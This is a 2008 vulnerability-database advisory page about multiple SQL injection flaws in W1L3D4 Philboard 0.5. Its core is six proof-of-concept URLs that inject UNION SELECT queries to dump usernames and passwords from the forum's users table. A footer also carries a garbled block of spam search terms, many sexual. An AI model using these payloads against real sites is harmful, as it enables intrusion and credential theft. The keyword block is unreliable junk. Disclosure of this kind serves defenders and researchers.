about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , W1L3D4 Philboard Multiple SQL Injection Vulnerabilities


Title W1L3D4 Philboard Multiple SQL Injection Vulnerabilities
Published 2008-05-14-12:00AM
Updated 2008-05-15-06:25PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  U238
Vulnerable  W1L3D4 Philboard 0.5
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available: http://www.example.com:2222/lab/philboard_v5/admin/philboard_admin-forumedit.asp?forumid=1+union+select+0,username,password,4,5,1,1+from+users
http://www.example.com:2222/lab/philboard_v5/admin/philboard_admin-forum.asp?forumid=1+union+select+0,2,3,4,5,2,password,7,1,1,1,username,1,1,1,1,1,1,password+from+users
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?id=1+union+select+(password),username,password,password,4,1,1,1,null,1,password,password,password,password,password+from+users
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?topic=1+union+select+0,1,username,3,password,5,6+from+users
http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 28 Aug 2008 16:26:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.68.Com sex hindi. wwwse 23 oracle9i i beast sex Serv-U ftp WWW.HAIFA. vidio se Www.animal Serv-U ftp veadio bathing gi www;sexyvi porno izle jotheka SEXYPHOTOE WWW.Gadis. Freexxxmov www.milfhu joomla com Sexarabec SSH-1.99-O iRDMI Freexxxmov Ww xxl www.xvideo iRDMI Www sex gi /index.php t45t www,com89 exploit+ip porno down Afghansex iRDMI Video cicc vedios 200 /compo iran -prox Indiansex. Linux 6.9 www.pakist TABOOSEX tollywoods gnomr jacket hi im moha sexe vedio www.wwesex Dick